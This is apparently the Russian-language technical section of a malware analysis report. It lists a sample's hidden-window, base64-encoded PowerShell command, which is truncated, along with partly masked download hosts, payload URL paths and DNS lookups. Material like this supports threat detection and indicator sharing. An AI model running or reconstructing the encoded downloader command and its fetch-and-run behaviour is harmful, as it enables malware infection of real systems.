Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JAB7AHcAcwBgAEMAYABSAEkAUAB0AH0AIAA9ACAALgAoACIAewAwAH0AewAyAH0AewAxAH0AIgAgAC0AZgAgACcAbgBlAHcALQAnACwAJwBiAGoAZQBjAHQAJwAsACcAbwAnACkAIAAtAEMAbwBtAE8AYgBqAGUAYwB0ACAAKAAiAHsAMQB9AHsAMgB9AH...
- 'ca####aumusic.com':80
- 'we###rnware.net':80
- 'na###h.com.br':80
- 'er#.lt':80
- http://ca####aumusic.com/doMzwrAj/
- http://we###rnware.net/pUBZVVGhYW/
- http://na###h.com.br/wVZtWN/
- http://er#.lt/wUGfcJn/
- DNS ASK br####eweese.org
- DNS ASK ca####aumusic.com
- DNS ASK we###rnware.net
- DNS ASK na###h.com.br
- DNS ASK er#.lt
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JAB7AHcAcwBgAEMAYABSAEkAUAB0AH0AIAA9ACAALgAoACIAewAwAH0AewAyAH0AewAxAH0AIgAgAC0AZgAgACcAbgBlAHcALQAnACwAJwBiAGoAZQBjAHQAJwAsACcAbwAnACkAIAAtAEMAbwBtAE8AYgBqAGUAYwB0ACAAKAAiAHsAMQB9AHsAMgB9AH...' (со скрытым окном)